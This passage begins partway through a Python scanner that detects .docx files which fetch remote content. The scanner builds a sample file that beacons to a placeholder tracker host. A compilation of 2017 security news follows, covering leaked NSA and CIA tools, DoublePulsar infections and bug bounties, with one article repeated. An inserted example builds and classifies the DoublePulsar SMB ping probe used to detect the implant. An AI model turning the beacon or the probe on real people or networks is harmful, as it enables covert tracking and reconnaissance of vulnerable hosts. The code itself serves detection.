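        if not name.endswith(".rels"):
            continue
        root = ET.fromstring(zf.read(name))
        for rel in root.iter(f"{{{REL_NS}}}Relationship"):
            if rel.get("TargetMode", "Internal").lower() == "external":
                rel_type = rel.get("Type", "").rsplit("/", 1)[-1]
                hits.append((name, rel.get("Id"), rel_type, rel.get("Target")))
    return hits


def remote_fields(zf: zipfile.ZipFile) -> list:
    """Field codes in word/*.xml (body, headers, footers) that fetch content from a URL."""
    hits = []
    for name in zf.namelist():
        if not (name.startswith("word/") and name.endswith(".xml")):
            continue
        root = ET.fromstring(zf.read(name))
        # Simple fields keep the code in w:instr; complex fields spread it over w:instrText runs.
        codes = [e.get(f"{{{W_NS}}}instr", "") for e in root.iter(f"{{{W_NS}}}fldSimple")]
        codes += [e.text or "" for e in root.iter(f"{{{W_NS}}}instrText")]
        for code in codes:
            m = FIELD_RE.search(code)
            if m:
                hits.append((name, m.group(1).upper(), m.group(2)))
    return hits


def scan_docx(data: bytes) -> dict:
    """Report every remote reference; any http(s) target means the file phones home on open."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        rels = external_relationships(zf)
        fields = remote_fields(zf)
    targets = [r[3] for r in rels] + [f[2] for f in fields]
    urls = sorted({t for t in targets if t.lower().startswith(("http://", "https://"))})
    return {"external_relationships": rels, "remote_fields": fields,
            "remote_urls": urls, "beacon_suspected": bool(urls)}


def build_sample_docx(watermarked: bool) -> bytes:
    """Minimal constructed .docx; with watermarked=True it carries a linked image
    and an INCLUDEPICTURE field that both point at a placeholder tracker host."""
    tracker = "http://tracker.invalid/wm/7f3a9c"   # placeholder host and per-document token
    rels = f'<Relationships xmlns="{REL_NS}">'
    rels += f'<Relationship Id="rId1" Type="{OFFICE_REL}/styles" Target="styles.xml"/>'
    if watermarked:
        rels += (f'<Relationship Id="rId2" Type="{OFFICE_REL}/image" '
                 f'Target="{tracker}.png" TargetMode="External"/>')
    rels += "</Relationships>"
    body = "<w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p>"
    if watermarked:
        body += (f'<w:p><w:fldSimple w:instr="INCLUDEPICTURE &quot;{tracker}.gif&quot; \\d">'
                 "<w:r><w:t> </w:t></w:r></w:fldSimple></w:p>")
    doc = f'<w:document xmlns:w="{W_NS}"><w:body>{body}</w:body></w:document>'
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml",
                    '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"/>')
        zf.writestr("_rels/.rels", f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
                    f'Type="{OFFICE_REL}/officeDocument" Target="word/document.xml"/></Relationships>')
        zf.writestr("word/document.xml", doc)
        zf.writestr("word/_rels/document.xml.rels", rels)
        zf.writestr("word/styles.xml", f'<w:styles xmlns:w="{W_NS}"/>')
    return buf.getvalue()


if __name__ == "__main__":
    for flag in (True, False):
        print(scan_docx(build_sample_docx(flag)))
```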

This is the latest batch of files released by Wikileaks; in chronological order the organization has leaked:
The Year Zero batch, which revealed CIA hacking exploits for hardware and software.
The Dark Matter dump, containing iPhone and Mac hacking exploits.
The Marble batch, focused on a framework used by the CIA to make the attribution of cyber attacks harder.
The Grasshopper batch, which reveals a framework to customize malware for breaking into Microsoft’s Windows and bypassing antivirus protection.


Hack'em If You Can — U.S. Air Force launches Bug Bounty Program
27.4.2017 thehackernews BigBrothers
With the growing number of data breaches and cyber attacks, a significant number of companies and organizations have started Bug Bounty programs for encouraging hackers and bug hunters to find and responsibly report vulnerabilities in their services and get rewarded.
Now, following the success of the "Hack the Pentagon" and "Hack the Army" initiatives, the United States Department of Defense (DoD) has announced the launch of the "Hack the Air Force" bug bounty program.
Hacking or breaking into Defense Department networks was once strictly illegal, but after the "Hack the Pentagon" initiative, the DoD started rewarding outsiders for finding and reporting weaknesses in its private networks.
"This is the first time the AF [Air Force] has opened up...networks to such a broad scrutiny," Peter Kim, the Air Force Chief Information Security Officer said in a statement. "We have malicious hackers trying to get into our systems every day."
"It'll be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cyber security and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities."
The "Hack the Air Force" program is directed by HackerOne, the bug bounty startup that was behind Hack the Pentagon, and Luta Security, the security consulting company driving the U.K. program.
Hackers From The Five Eyes Nations Are Invited
This program will be the DoD's largest bug bounty project as it invites experts and white hat hackers not only from the United States, but also from remaining Five Eyes countries: the United Kingdom, Canada, Australia and New Zealand.
So, only hackers and bug hunters from the Five Eyes intelligence alliance are eligible to participate in Hack the Air Force.
"This outside approach – drawing on the talent and expertise of our citizens and partner nation citizens – in identifying our security vulnerabilities will help bolster our cyber security," said Air Force Chief of Staff Gen. David L. Goldfein.
"We already aggressively conduct exercises and 'red team' our public facing and critical websites. But this next step throws open the doors and brings additional talent onto our cyber team."
Only Vetted Hackers Can Participate
Only "Vetted Hackers" can participate in Hack the Air Force program, which means the candidates must pass a rigorous background test after registration and have a clean criminal record in order to participate in the program.
However, according to some critics, this process excludes many talented hackers and bug hunters, but this is one of the common conditions across all of the Pentagon's bug bounty programs.
Registration for "Hack the Air Force" will start on May 15 and interested participants should register through HackerOne. The contest will launch on May 30 and last until June 23.
The first DoD bug bounty program, "Hack the Pentagon," came in April 2016, in which over 14,000 participating hackers found 138 vulnerabilities in DoD systems and were awarded over $75,000 in bounties.
Just like the bug bounty programs offered by several leaders in the technology industry, Hack the Air Force is also an exercise for federal authorities to bolster their security measures and counter cyber attacks.


Hack the Air Force bug bounty initiative is going to start
27.4.2017 securityaffairs  BigBrothers

The United States Air Force has launched the ‘Hack the Air Force’ bug bounty program to test the security of its networks and computer systems.
I have discussed many times the importance and the numerous advantages of a bug bounty program.

Bug bounties are very popular initiatives among white-hat communities and major companies, including Facebook, Google, and Microsoft. Facebook, for example, announced that it has paid more than $3 million since 2011, when its bug bounty program was launched.

A year ago the Pentagon launched the ‘Hack the Pentagon’ initiative, the first-ever program of its kind, that aims to test the resilience to cyber attacks of the US defenses.

News of the day is that the United States Air Force has announced the ‘Hack the Air Force’ bug bounty program to test the security of its networks and computer systems.
The initiative was announced yesterday by the US Air Force via a Facebook live stream; the bug bounty initiative is operated by HackerOne and called ‘Hack the Air Force’.

White-hat hackers are invited to participate in the programme to find security vulnerabilities affecting systems exposed on the Internet by the US Air Force.

The US Government will pay for any bug discovered under the ‘Hack the Air Force’ initiative.

“We have millions of probes a day, a week, on our DoD systems quite frankly. These are probably people out there, around the world, who particularly aren’t friendly with the Department of Defense. And they generally don’t tell us what’s wrong with our systems until we find out that something’s been hacked. And so I want to turn that around. I want to know beforehand where our vulnerabilities are. I know we have vulnerabilities, and I want to know where those are in the United States Air Force.” said Chief Information Security Officer Peter Kim.

Kim highlighted the importance of an external security assessment of the systems of the US Air Force: it is essential to discover vulnerabilities before threat actors do, and bug bounty initiatives are very useful in this sense.

Researchers and white-hat hackers who want to participate in the challenge will need to register on the HackerOne website; the operators of the platform will then make the necessary checks before granting access to the programme.

Military members and government civilians are not eligible for compensation, but they can still participate on duty with supervisor approval.

Registration for Hack the Air Force is scheduled to begin May 15th and is open to United States, UK, Australian, New Zealand, and Canadian citizens. These states belong to the so-called Five Eyes intelligence alliance. The Hack the Air Force bug bounty program will run from May 30 to June 23.

Experts believe the US Government and the US Air Force may run other bug bounty initiatives in the future.

At the time of writing there is no news about the total amount of money reserved for the initiative; the DoD’s Hack the Pentagon initiative paid $75,000 in bounties, and the Department of Defense has in the past offered bounty payments of up to $150,000 for hackers who discover security vulnerabilities.


DoD Launches "Hack the Air Force" Bug Bounty Program

27.4.2017 securityweek BigBrothers
Following the success of the “Hack the Pentagon” and “Hack the Army” initiatives, the U.S. Department of Defense announced on Wednesday the launch of the “Hack the Air Force” bug bounty program.

“Hack the Air Force” will be the Pentagon’s largest bug bounty project as it’s open to experts not only from the United States, but also from the other Five Eyes countries, which include the United Kingdom, Canada, Australia and New Zealand.

The program, run on the HackerOne platform, aims to help the Air Force strengthen its critical assets. White hat hackers who report vulnerabilities will be eligible for monetary rewards, but the exact amounts have not been specified.

Only vetted researchers can register; military members and government civilians can participate, but they will not earn any rewards.

“This is the first time the AF has opened up our networks to such a broad scrutiny,” said Air Force Chief Information Security Officer Peter Kim. “We have malicious hackers trying to get into our systems every day. It will be nice to have friendly hackers taking a shot and, most importantly, showing us how to improve our cybersecurity and defense posture. The additional participation from our partner nations greatly widens the variety of experience available to find additional unique vulnerabilities.”

Registration for “Hack the Air Force” opens on May 15. The event will take place between May 30 and June 23.

A total of 371 people registered for the previous Hack the Army program. They submitted 416 vulnerability reports, 118 of which were classified as unique and actionable. Participants were awarded roughly $100,000.

Hack the Pentagon received 138 valid submissions and it cost the U.S. government $150,000, half of which went to participants.


Hackers Are Using NSA's DoublePulsar Backdoor in Attacks

24.4.2017 securityweek BigBrothers
A hacking tool allegedly used by the NSA-linked threat actor “Equation Group” that was exposed to the public roughly a week ago has already been observed in live attacks.

Dubbed DoublePulsar, the backdoor was released by the Shadow Brokers hacker group on Friday before the Easter holiday, as part of a password-protected archive containing a larger set of tools and exploits. Last week Microsoft said that the newly revealed exploits don’t affect up-to-date systems.

DoublePulsar is the primary payload in SMB (Server Message Block) and RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, penetration tester zerosum0x0 explains.

This sophisticated, multi-architecture SMB backdoor can hide on a system and avoid alerting built-in defenses. An attacker could infect a system and return to it after a desired period of time to perform more intrusive actions.

MWR InfoSecurity's Countercept group also notes that DoublePulsar appears to be a very stealthy kernel-mode payload, while also revealing that it is dropped by default by many exploits. The backdoor, they say, can be used to inject arbitrary DLLs into user land processes.

Following in-depth analysis, Countercept discovered that the malware enumerates processes to find a suitable one into which to inject the user-land DLL and execute code. They also discovered that the payload wipes memory for evasion, though parts of the code appear to remain unwiped.

The firm also decided to build a script to detect the presence of both SMB and RDP versions of the DoublePulsar implant, so as to help people find compromises in their networks. “It re-implements the ping command of the implant, which can be used remotely without authentication, in order to determine if a system is infected or not,” they explain.

On April 18, after using the masscan tool developed by @ErrataRob to find 5,502,460 unique hosts with an open port 445 (the SMB port), Below0Day used Countercept’s detection script to detect 30,626 hosts with the DoublePulsar SMB implant. On April 21, the same scan revealed 5,190,506 exposed hosts and 56,586 infections, most of which were located in the United States.

This shows that the exploit is actively used in infection campaigns, and the number of compromised hosts appears to be growing fast, most probably as more actors start using the implant in their assaults.


Denmark Says Russia Hacked Defense Ministry Emails

24.4.2017 securityweek  BigBrothers
Denmark on Monday denounced Moscow's "aggressive" behavior after a report accused Russian hackers of infiltrating the defense ministry's email accounts.

"This is part of a continuing war from the Russian side in this field, where we are seeing a very aggressive Russia," Defense Minister Claus Hjort Frederiksen told Danish news agency Ritzau.

A report published Sunday by the Centre for Cyber Security accused a group of pro-Kremlin hackers of breaking into the emails of defense ministry employees in 2015 and 2016.

"The hacked emails don't contain military secrets, but it is of course serious," Frederiksen said.

The report identified the hacker group as APT28, also known as Pawn Storm, Sofacy and Fancy Bear, which has links to the Russian government and security services and has previously been named by the FBI and US Homeland Security as being behind "malicious cyber activity" against US government bodies.

The group is also believed to be behind other high-profile cyber attacks.

In Denmark, the Centre for Cyber Security said earlier this year that the threat against Danish authorities and companies remained "very high".


Hackers Are Using NSA's DoublePulsar Backdoor in Attacks

24.4.2017 securityweek BigBrothers
A hacking tool allegedly used by the NSA-linked threat actor “Equation Group” that was exposed to the public roughly a week ago has been already observed in live attacks.

Dubbed DoublePulsar, the backdoor was released by the Shadow Brokers hacker group on Friday before the Easter holiday, as part of a password-protected archive containing a larger set of tools and exploits. Last week Microsoft said that the newly revealed exploits don’t affect up-to-date systems.

DoublePulsar is the primary payload in SMB (Server Message Block) and RDP (Remote Desktop Protocol) exploits in the NSA’s FuzzBunch software, an exploitation framework similar to Metasploit, penetration tester zerosum0x0 explains.

This sophisticated, multi-architecture SMB backdoor can hide on a system and avoid alerting built-in defenses. An attacker could infect a system and return to it after a desired period of time to perform more intrusive actions.

MWR InfoSecurity's Countercept group also notes that DoublePulsar appears to be a very stealthy kernel-mode payload, while also revealing that it is dropped by default by many exploits. The backdoor, they say, can be used to inject arbitrary DLLs into user land processes.

Following in-depth analysis, Countercept found that the implant enumerates processes to find a suitable one into which to inject the user-land DLL and execute code. They also found that the payload wipes memory for evasion, though parts of the code appear to remain unwiped.

The firm also decided to build a script to detect the presence of both SMB and RDP versions of the DoublePulsar implant, so as to help people find compromises in their networks. “It re-implements the ping command of the implant, which can be used remotely without authentication, in order to determine if a system is infected or not,” they explain.

On April 18, after using the masscan tool developed by @ErrataRob to find 5,502,460 unique hosts with an open port 445 (SMB port), Below0Day used Countercept’s detection script to detect 30,626 hosts with DoublePulsar SMB implant. On April 21, the same scan revealed 5,190,506 exposed hosts and 56,586 infections, most of which were located in the United States.

This shows that the exploit is actively used in infection campaigns, and the number of compromised hosts appears to be growing fast, most probably because more actors are starting to use the implant in their attacks.


Hackers compromised thousands of Windows boxes using leaked NSA hack tools DOUBLEPULSAR and ETERNALBLUE
22.4.2017 securityaffairs BigBrothers

Security researchers warn that hackers have compromised thousands of Windows boxes using the leaked NSA hacking tools DOUBLEPULSAR and ETERNALBLUE.
Security expert Dan Tentler, the founder of security shop Phobos Group, has observed a significant increase in the number of Internet-exposed Windows boxes that have been backdoored with the DOUBLEPULSAR implant. The compromised boxes are being used for several criminal purposes, such as delivering malware or sending spam.

The DOUBLEPULSAR backdoor allows attackers to inject and execute malicious code on a target system. It is installed by leveraging ETERNALBLUE, an SMBv1 (Server Message Block 1.0) exploit that triggers remote code execution on older versions of Windows (Windows XP through Server 2008 R2).

Every Windows machine running an old, vulnerable version that exposes an SMB service is at risk.

DOUBLEPULSAR and ETERNALBLUE are now available to anyone, after the archive of NSA tools was leaked online.

Microsoft had already patched the SMB Server vulnerability (MS17-010) exploited by ETERNALBLUE; the security updates were released for Windows Vista SP2, Windows 7, Windows 8.1, Windows RT 8.1, Windows 10, Windows Server 2008 SP2, Windows Server 2008 R2 SP1, Windows Server 2012 and 2012 R2, Windows Server 2016, and Server Core installations.

According to Tentler, who scanned the Internet for vulnerable Windows boxes, 15,196 systems had already been compromised, most of them in the US.

The expert also observed that the number of infections continues to increase.

Windows boxes compromised with the DOUBLEPULSAR implant can be identified by observing the response to a special ping sent to port 445.
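The "ping" that the Countercept detection script re-implements and that Tentler's scan relies on can be reproduced and tested offline. What follows is an added example, not the Countercept script or any code from the articles: it builds the Trans2 SESSION_SETUP probe and classifies the reply by its Multiplex ID. The SMB framing follows MS-CIFS; the implant-specific constants (a probe MID of 0x41 that the implant answers with 0x51, the opcode carried as the byte-sum of the Trans2 Timeout field, 0x23 for ping) come from public analyses of the implant and are treated as assumptions here, as are the constructed sample replies. The SMB negotiate, session setup and tree connect that yield the TID, PID and UID are not shown.

```python
"""Offline re-implementation of the DoublePulsar SMB "ping" check (added example)."""
import struct

SMB_COM_TRANSACTION2 = 0x32
TRANS2_SESSION_SETUP = 0x000E   # Trans2 subcommand the implant hooks (assumption: per public analyses)
PROBE_MID = 0x41                # multiplex ID we send; a clean server echoes it back
IMPLANT_MID = 0x51              # the implant answers a ping with MID + 0x10 (assumption: per public analyses)
PING_TIMEOUT = 0x00A4D9A6       # bytes a6 d9 a4 00 sum to 0x223; low byte 0x23 = ping opcode
SMB_HEADER_LEN = 32


def implant_opcode(timeout):
    """Opcode the implant reads: low byte of the sum of the four little-endian Timeout bytes."""
    return sum(struct.pack("<I", timeout)) & 0xFF


def smb_header(command, tid, pid, uid, mid, status=0, flags=0x18, flags2=0xC007,
               signature=b"\x00" * 8):
    """32-byte SMB1 header (MS-CIFS 2.2.3.1)."""
    return (b"\xffSMB"
            + struct.pack("<BIBH", command, status, flags, flags2)
            + b"\x00\x00"          # PIDHigh
            + signature            # SecurityFeatures, 8 bytes
            + b"\x00\x00"          # Reserved
            + struct.pack("<HHHH", tid, pid, uid, mid))


def trans2_request(subcommand, timeout, params):
    """SMB_COM_TRANSACTION2 request block: one setup word, parameters only, no data section."""
    word_count = 15
    param_offset = SMB_HEADER_LEN + 1 + word_count * 2 + 2 + 1   # relative to header start, +1 pad
    data_offset = param_offset + len(params)
    words = struct.pack("<HHHHBBHIHHHHHBB",
                        len(params), 0,        # TotalParameterCount, TotalDataCount
                        1, 0,                  # MaxParameterCount, MaxDataCount
                        0, 0,                  # MaxSetupCount, Reserved1
                        0,                     # Flags
                        timeout,               # Timeout: abused by the implant as opcode carrier
                        0,                     # Reserved2
                        len(params), param_offset,
                        0, data_offset,
                        1, 0)                  # SetupCount, Reserved3
    setup = struct.pack("<H", subcommand)
    byte_count = struct.pack("<H", 1 + len(params))
    return bytes([word_count]) + words + setup + byte_count + b"\x00" + params


def netbios(smb):
    """NetBIOS session message: type byte 0x00 followed by a 24-bit big-endian length."""
    return struct.pack(">I", len(smb)) + smb


def build_ping(tid, pid, uid):
    """The probe: Trans2 SESSION_SETUP with MID 0x41 and the ping opcode encoded in Timeout."""
    smb = (smb_header(SMB_COM_TRANSACTION2, tid, pid, uid, PROBE_MID)
           + trans2_request(TRANS2_SESSION_SETUP, PING_TIMEOUT, b"\x00" * 12))
    return netbios(smb)


def parse_smb(packet):
    """Header fields of a NetBIOS-framed SMB1 packet, or None if it is not one."""
    if len(packet) < 4 + SMB_HEADER_LEN or packet[4:8] != b"\xffSMB":
        return None
    command, status, flags, flags2 = struct.unpack_from("<BIBH", packet, 8)
    tid, pid, uid, mid = struct.unpack_from("<HHHH", packet, 28)
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "signature": packet[18:26], "tid": tid, "pid": pid, "uid": uid, "mid": mid}


def classify(response):
    """Verdict for the reply to build_ping(): 'infected', 'clean', or why it is neither."""
    hdr = parse_smb(response)
    if hdr is None:
        return "not-smb"
    if not hdr["flags"] & 0x80:          # SMB_FLAGS_REPLY not set
        return "not-a-response"
    if hdr["command"] != SMB_COM_TRANSACTION2:
        return "unexpected-command"
    if hdr["mid"] == IMPLANT_MID:
        return "infected"                # only the implant rewrites the multiplex ID
    if hdr["mid"] == PROBE_MID:
        return "clean"                   # a normal server echoes our MID back unchanged
    return "unknown"


def probe(sock, tid, pid, uid):
    """Send the ping over a socket on which the caller already completed the SMB handshake."""
    sock.sendall(build_ping(tid, pid, uid))
    return classify(sock.recv(1024))


def constructed_reply(mid, status=0xC0000002):
    """Constructed sample reply (not captured traffic): empty Trans2 response carrying `mid`."""
    smb = smb_header(SMB_COM_TRANSACTION2, 0, 0, 0, mid, status=status, flags=0x98) + b"\x00\x00\x00"
    return netbios(smb)
```

`probe()` expects a socket on which the negotiate, session setup and tree connect have already been done; `classify()` can equally be run over raw replies captured from any SMB client that sent the same probe. Because the implant is memory-resident, a reboot clears an "infected" host but leaves its unpatched SMB service exposed to reinfection until MS17-010 is applied.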


“I’m hopeful this is the wake-up moment for people over patching Windows machines,” said Tentler.
According to Tentler, over the Easter weekend script kiddies worldwide launched massive attacks that used ETERNALBLUE to plant the DOUBLEPULSAR implant.

The experts have no doubt that the number of DOUBLEPULSAR infections will keep increasing in the coming weeks.


Leaked NSA Hacking Tools Being Used to Hack Thousands of Vulnerable Windows PCs

22.4.2017 thehackernews  BigBrothers

Script kiddies and online criminals around the world have reportedly started exploiting NSA hacking tools leaked last weekend to compromise hundreds of thousands of vulnerable Windows computers exposed on the Internet.
Last week, the mysterious hacking group known as Shadow Brokers leaked a set of Windows hacking tools targeting Windows XP, Windows Server 2003, Windows 7 and 8, and Windows 2012, allegedly belonging to the NSA's Equation Group.
What's worse? Microsoft quickly downplayed the security risks, pointing out that patches for all the exploited vulnerabilities had already been released, but there are still risks in the wild from unsupported systems and from those who haven't yet installed the patches.
Multiple security researchers have performed mass Internet scans over the past few days and, using a free detection tool released on GitHub for anyone to use, found tens of thousands of Windows computers worldwide infected with DoublePulsar, a suspected NSA spying implant.
Security researchers from Switzerland-based security firm Binary Edge performed an Internet scan and detected more than 107,000 Windows computers infected with DoublePulsar.
A separate scan done by Errata Security CEO Rob Graham detected roughly 41,000 infected machines, while another by researchers from Below0day detected more than 30,000 infected machines, a majority of which were located in the United States.
The impact? DoublePulsar is a backdoor used to inject and run malicious code on already infected systems, and is installed using the EternalBlue exploit that targets SMB file-sharing services on Microsoft's Windows XP to Server 2008 R2.
Therefore, to be compromised a machine must be running a vulnerable version of Windows with an SMB service exposed to the attacker.
Both DoublePulsar and EternalBlue are suspected as Equation Group tools and are now available for any script kiddie to download and use against vulnerable computers.
Once installed, DoublePulsar lets attackers use the hijacked computers to deliver malware, send spam, and launch further attacks on other victims. To remain stealthy, the backdoor writes no files to the PCs it infects, which also means it does not survive a reboot; the underlying SMB vulnerability does, so an unpatched host can simply be reinfected.
While Microsoft has already patched the majority of the exploited flaws in affected Windows operating systems, those who have not patched are vulnerable to exploits such as EternalBlue, EternalChampion, EternalSynergy, EternalRomance, EmeraldThread, and EducatedScholar.
Moreover, systems still running end-of-life platforms like Windows XP, Windows Server 2003, and IIS 6.0, which no longer receive security updates, are also vulnerable to the in-the-wild exploits.
Since it takes hackers roughly a few hours to download the Shadow Brokers dump, scan the Internet with the tool released on Monday, and deliver hacking exploits, researchers are expecting more vulnerable and unpatched computers to fall victims to DoublePulsar.
After this news had broken, Microsoft officials released a statement saying: "We doubt the accuracy of the reports and are investigating."
Meanwhile, Windows users who haven't applied MS17-010 by now are strongly advised to download and deploy the patches as soon as possible.


WikiLeaks Details Samsung Smart TV Hacking Tool

22.4.2017 securityweek BigBrothers
WikiLeaks has released a document detailing yet another hacking tool allegedly used by the U.S. Central Intelligence Agency (CIA). This time, the organization has published information on a tool designed to record audio via the built-in microphone of some Samsung smart TVs.

The tool, dubbed “Weeping Angel,” is apparently based on “Extending,” an implant allegedly developed by British security service MI5 – the agencies are said to have worked together on this project.

Some information on Weeping Angel was made public by WikiLeaks as part of the first Vault 7 dump, and the organization has now decided to also release a user guide.

The newly released guide, dated February 2014, describes an implant for Samsung F series smart TVs. The implant can record audio from a device via the built-in microphone and either store or exfiltrate the recordings.

The Weeping Angel implant can be installed by connecting a USB device to the targeted TV, and data can be exfiltrated either via a USB stick or a compromised Wi-Fi hotspot. However, previously leaked documents showed that its developers had been planning to add more data theft capabilities, including for browser data and Wi-Fi credentials, and even exploiting available remote access features.

SecurityWeek has reached out to Samsung for comment and will update this article if the company responds.

Last week, WikiLeaks released six documents describing a project named HIVE, which the CIA allegedly used to exfiltrate information from compromised machines and send commands to the malware found on these devices.

The whistleblower organization has also detailed hacking tools targeting security products, a framework used to make attribution and analysis of malware more difficult, and a platform designed for creating custom malware installers.

While WikiLeaks has offered to share the exploits it possesses with affected tech companies, most firms don’t seem willing to comply with WikiLeaks’ conditions for obtaining the files. Furthermore, an analysis of the available information showed that many of the vulnerabilities have already been patched.

U.S. authorities have neither confirmed nor denied the authenticity of the Vault 7 files, but reports say both the CIA and the FBI are hunting for an insider who may have provided the information to WikiLeaks.

Researchers at Symantec and Kaspersky have found links between the leaked Vault 7 files and the tools used by a cyber espionage group tracked by the security firms as Longhorn and The Lamberts, respectively.


Arrest of WikiLeaks's Assange a 'Priority': US Top Cop

21.4.2017 securityweek BigBrothers
The arrest of WikiLeaks founder Julian Assange is a US "priority," Attorney General Jeff Sessions said Thursday, as media reports indicated his office was preparing charges against the fugitive anti-hero.

"We are going to step up our effort and already are stepping up our efforts on all leaks," Sessions, America's top cop, said at a news conference in response to a reporter's question about a US priority to arrest Assange.

The Justice Department chief said a rash of leaks of sensitive secrets appeared unprecedented.

"This is a matter that's gone beyond anything I'm aware of. We have professionals that have been in the security business of the United States for many years that are shocked by the number of leaks and some of them are quite serious," he said.

"Whenever a case can be made, we will seek to put some people in jail."

Prosecutors in recent weeks have been drafting a memo that looks at charges against Assange and members of WikiLeaks that possibly include conspiracy, theft of government property and violations of the Espionage Act, the Washington Post reported, citing unnamed US officials familiar with the matter.

Several other media outlets also cited unnamed officials as saying US authorities were preparing charges against Assange. The Justice Department declined to comment on the reports.

Assange, 45, has been holed up at the Ecuadoran embassy in London since 2012 trying to avoid extradition to Sweden where he faces a rape allegation that he denies.

He fears Sweden would extradite him to the United States to face trial for leaking hundreds of thousands of secret US military and diplomatic documents that first gained attention in 2010.

Assange's case returned to the spotlight after WikiLeaks was accused of meddling in the US election last year by releasing a damaging trove of hacked emails from presidential candidate Hillary Clinton's campaign and the Democratic party.

US officials say the emails were hacked with the aid of the Russian government in its bid to influence the US election.

Critics say their release late in the race helped to tip the November 8 election to Republican Donald Trump.

Trump and his administration have put heat on WikiLeaks after it embarrassed the Central Intelligence Agency last month by releasing a large number of files and computer code from the spy agency's top-secret hacking operations.

The documents showed how the CIA exploits vulnerabilities in popular computer and networking hardware and software to gather intelligence.

Supporters of WikiLeaks say it's practicing the constitutional right of freedom of speech and the press.

- 'Hostile intelligence service'-

CIA Director Mike Pompeo last week branded WikiLeaks a "hostile intelligence service," saying it threatens democratic nations and joins hands with dictators.

Pompeo focused on the anti-secrecy group and other leakers of classified information like Edward Snowden as one of the key threats facing the United States.

"WikiLeaks walks like a hostile intelligence service and talks like a hostile intelligence service. It has encouraged its followers to find jobs at CIA in order to obtain intelligence... And it overwhelmingly focuses on the United States, while seeking support from anti-democratic countries and organizations," said Pompeo.

"It is time to call out WikiLeaks for what it really is -- a non-state hostile intelligence service often abetted by state actors like Russia."

The day before Pompeo spoke, Assange published an opinion piece in The Washington Post in which he said his group's mission was the same as America's most respected newspapers: "to publish newsworthy content."

"WikiLeaks's sole interest is expressing constitutionally protected truths," he said, professing "overwhelming admiration for both America and the idea of America."


The alleged link between the Shadow Brokers data leak and the Stuxnet cyber weapon
18.4.2017 securityaffairs BigBrothers

Security researchers who analyzed the documents and hacking tools included in the last Shadow Brokers dump found a link to the Stuxnet virus.
On Friday, the Shadow Brokers leaked a new bunch of files belonging to the alleged NSA arsenal.

Security researchers who analyzed the documents and hacking tools included in the last dump have discovered many exploits specifically designed to compromise Windows systems.

Digging through the archive, experts spotted a surprising exploit that was used in the Stuxnet cyber weapon, the malware used to sabotage Iran's nuclear programme at the Natanz plant.

According to Symantec researcher Liam O’Murchu, the exploit was developed for Windows’ MOF files and it is “almost the exact same script” used in Stuxnet.

“There is a strong connection between Stuxnet and the Shadow Brokers dump,” O’Murchu told Motherboard in an email. “But not enough to definitively prove a connection.”
Let’s see the similarities between the Stuxnet code and the exploit code in the last dump leaked by Shadow Brokers.

Below, a portion of the script from Stuxnet, followed by a portion of the script dumped by The Shadow Brokers (the two screenshots, "Stuxnet code vs Shadow Brokers exploit", are not reproduced here).


Of course, whoever developed the tool included in the Shadow Brokers dump may have borrowed the script from public knowledge of Stuxnet. The same code, for example, was included in the Metasploit framework, allowing anyone to create a MOF file like the one exploited in the Stuxnet attack.

O’Murchu highlighted that the MOF file creation tool in the Shadow Brokers dump carries a last-compiled date of September 9, 2010, a few months after Stuxnet's discovery but “shortly before the code was added to Metasploit.”

The researcher Kevin Beaumont believes that there is a link between Stuxnet and the exploit shared by the Shadow Brokers.

Kevin Beaumont (@GossiTheDog), 2:48 PM - 14 Apr 2017:
“lol I think this one I just found is one of the exploits used in Stuxnet, even notes patch num”
Lorenzo Franceschi-Bicchierai from Motherboard also reported that the Avast Antivirus detects some exploits in the Shadow Brokers dump as Stuxnet.

Even if this is a false positive, it is very curious that the signatures of these exploits match Stuxnet's.

Are we looking at evidence that the NSA-linked Equation Group was involved in the Stuxnet attack, or is this a well-organized false-flag operation?
“Therefore, the Stuxnet MOF file creation tool that the Shadow Brokers dropped on Friday is possibly the earliest technical evidence that NSA hackers and developers coded Stuxnet, as many suspect.” added Franceschi-Bicchierai.


Microsoft biannual transparency report – US foreign intelligence surveillance requests more than doubled
17.4.2017 securityaffairs BigBrothers

Microsoft has published its biannual transparency report; the number of US foreign intelligence surveillance requests more than doubled.
According to the data in the report, the number of requests Microsoft received under the Foreign Intelligence Surveillance Act (FISA) was more than double what the company had reported for the preceding six months.

Microsoft Corp announced it had received in the first half of 2016 at least a thousand surveillance requests from the US Government that sought user content for foreign intelligence purposes.

This is the highest number of requests Microsoft has listed since 2011, when it began tracking such government surveillance orders.

Privacy advocates in Congress are concerned about such increase and call for reforms to any FISA legislation in order to limit US Government from searching of American data that is incidentally collected during foreign surveillance operations.

FISA orders have to be approved by judges at the Foreign Intelligence Surveillance Court and they are usually kept secret.

“Microsoft said it received between 1,000 and 1,499 FISA orders for user content between January and June of 2016, compared to between 0 and 499 during both January-June 2015 as well as the second half of 2015.” reported Reuters.

The Microsoft biannual transparency report consists of the Law Enforcement Requests Report, the U.S. National Security Orders Report and the Content Removal Requests Report.

“Microsoft received 1,000-1,499 FISA orders seeking content disclosures affecting 12,000-12,499 accounts, compared to the 0-499 FISA orders seeking disclosure of content impacting 17,500-17,999 accounts reported for the previous period.” states Microsoft. “We received 0-499 National Security Letters in the latest reporting period, which remains unchanged from the previous period.”


A portion of the FISA will expire at the end of the year unless lawmakers vote to reauthorize it.

Microsoft also disclosed for the first time a national security letter (NSL), a form of warrantless surveillance order used by the FBI to obtain data about a customer of the company.

“As part of the release of these reports, we are also disclosing a National Security Letter (NSL) we received from the Federal Bureau of Investigation (FBI) in 2014, which sought data belonging to a customer of our consumer services.” states Microsoft.

Microsoft isn’t the only company to have disclosed an NSL; Twitter and Yahoo did the same in recent months under a transparency measure of the USA Freedom Act.


Hacked Files Suggest NSA Penetrated SWIFT, Mideast Banks

16.4.2017 securityweek BigBrothers
Files released by the mysterious hacker Shadow Brokers suggested Friday the US National Security Agency had penetrated the SWIFT banking network and monitored a number of Middle East banks.

